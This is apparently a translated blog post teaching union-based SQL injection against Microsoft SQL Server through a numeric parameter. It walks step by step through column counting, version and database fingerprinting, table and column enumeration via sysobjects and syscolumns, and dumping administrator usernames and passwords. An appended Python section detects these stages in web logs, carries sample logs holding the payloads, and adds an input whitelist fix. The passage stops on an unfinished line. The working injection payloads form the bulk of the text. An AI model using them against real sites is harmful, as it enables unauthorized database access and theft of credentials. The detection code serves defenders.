Author: zerosoul
Blog: http://hi.baidu.com/0soul
Please keep this copyright notice when reprinting.
This is a short summary of injection techniques written up along the way during this attack-and-defense competition, organized around the table structure of the SQL Server query system (sysobjects and syscolumns). As long as the injection point is valid and single quotes are not filtered, you can enumerate the administrator table name and column names no matter how complex the author made them, and because union is used the process is still very efficient. Only dbo permission is needed.
Take a numeric injection point as an example (assume, for now, that single quotes are not filtered at this point).
First, use order by to determine the number of columns returned by the SQL statement, then verify it with a union (here we select directly from the sysobjects system table of the current database):
ID=735 order by 8
ID=-735 union select 1,2,3,4,5,6,7,8 from sysobjects
Or
ID=-735 union select 1,2,3,4,5,6,7,8 from master.dbo.sysobjects
Assume that columns 2, 3, and 4 are displayed on the page.
Check the version and database name while you are at it:
ID=-735 union select 1,@@version,db_name(),4,5,6,7,8 from sysobjects
// Note the current database name, dbname.
Then query the table names (increment the second top N from 0 to walk through the table names of the current database):
ID=-735 union select 1,2,(select top 1 name from sysobjects where xtype='U' and name not in (select top 0 name from sysobjects where xtype='U')),4,5,6,7,8 from sysobjects
To query the table names of another database, the same approach works:
ID=-735 union select 1,2,(select top 1 name from [dbname]..sysobjects where xtype='U' and name not in (select top 0 name from [dbname]..sysobjects where xtype='U')),4,5,6,7,8 from sysobjects
// Found the administrator table, admin.
Next, guess the column names (increment the second top N from 0 to walk through the columns of the admin table):
ID=-735 union select 1,2,(select top 1 name from syscolumns where id in (select id from sysobjects where name='admin') and name not in (select top 2 name from syscolumns where id in (select id from sysobjects where name='admin'))),4,5,6,7,8 from sysobjects
// Here the administrator username and password columns turn out to be name and psw.
The rest is straightforward: retrieve the administrator usernames and passwords one row at a time (modify the second top N to walk through the rows):
// Assumes the table name admin and the column names name and psw found above.
ID=-735 union select top 1 1,name,psw,4,5,6,7,8 from admin where name not in (select top 0 name from admin)
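As an added example (not part of the original post), the Python snippet below shows what this enumeration chain looks like from the defender's side. It tags the stages used above in decoded request URIs (the order by probe, the union probe, @@version/db_name() fingerprinting, sysobjects/syscolumns enumeration, and top N ... not in row walking), runs that classifier over a few constructed web-server log lines, and includes the input check that closes a numeric injection point in the first place. The log lines, the path /show.asp and the stage names are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the enumeration stages described in the post (union-based
# injection against a numeric SQL Server parameter). Each regex is applied to
# the URL-decoded, whitespace-normalized query string.
STAGES = [
    ("column-count probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union probe", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("fingerprint", re.compile(r"@@version|\bdb_name\s*\(", re.I)),
    ("schema enumeration",
     re.compile(r"\b(sysobjects|syscolumns|information_schema)\b", re.I)),
    ("row walking", re.compile(r"\btop\s+\d+\b.*\bnot\s+in\s*\(", re.I | re.S)),
]

# Request line of a common/combined-format access log: "GET /path?qs HTTP/1.1"
LOG_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/[\d.]+"')

# Constructed sample log lines (hypothetical host, path and timestamps).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /show.asp?ID=735 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /show.asp?ID=735%20order%20by%208 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /show.asp?ID=-735%20union%20select%201,@@version,db_name(),4,5,6,7,8%20from%20sysobjects HTTP/1.1" 200 5301',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /show.asp?ID=-735%20union%20select%201,2,(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27U%27%20and%20name%20not%20in%20(select%20top%200%20name%20from%20sysobjects%20where%20xtype=%27U%27)),4,5,6,7,8%20from%20sysobjects HTTP/1.1" 200 5310',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /show.asp?ID=736 HTTP/1.1" 200 5100',
]


def classify(query_string):
    """Return the list of enumeration stages whose signature matches the query string."""
    decoded = unquote_plus(query_string)
    # Strip inline comments and collapse whitespace so keyword-splitting
    # tricks (union/**/select, tabs, multiple spaces) still match.
    normalized = re.sub(r"/\*.*?\*/", " ", decoded)
    normalized = re.sub(r"\s+", " ", normalized)
    return [name for name, rx in STAGES if rx.search(normalized)]


def scan_log(lines):
    """Return (request_path, [stages]) for every log line carrying a suspicious query string."""
    findings = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        path = m.group(1)
        qs = path.split("?", 1)[1] if "?" in path else ""
        hits = classify(qs)
        if hits:
            findings.append((path, hits))
    return findings


def parse_id(raw):
    """Whitelist check for the numeric parameter.

    A numeric injection point exists only because the raw string is pasted
    into the SQL text. Accepting nothing but a bounded run of digits (and then
    binding the integer as a query parameter) removes the injection entirely.
    """
    if not re.fullmatch(r"\d{1,9}", raw):
        raise ValueError("id must be a positive integer")
    return int(raw)


if __name__ == "__main__":
    for path, stages in scan_log(SAMPLE_LOG):
        print(f"{path}\n    -> {', '.join(stages)}")
```

The classifier is deliberately coarse: a single order by or top N in a legitimate parameter is not proof of anything, but the same client moving through probe, fingerprint and sysobjects/syscolumns enumeration within seconds, as in the sample, is the sequence worth alerting on. The durable fix is parse_id plus a parameterized query, not the signatures.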
Add a system table: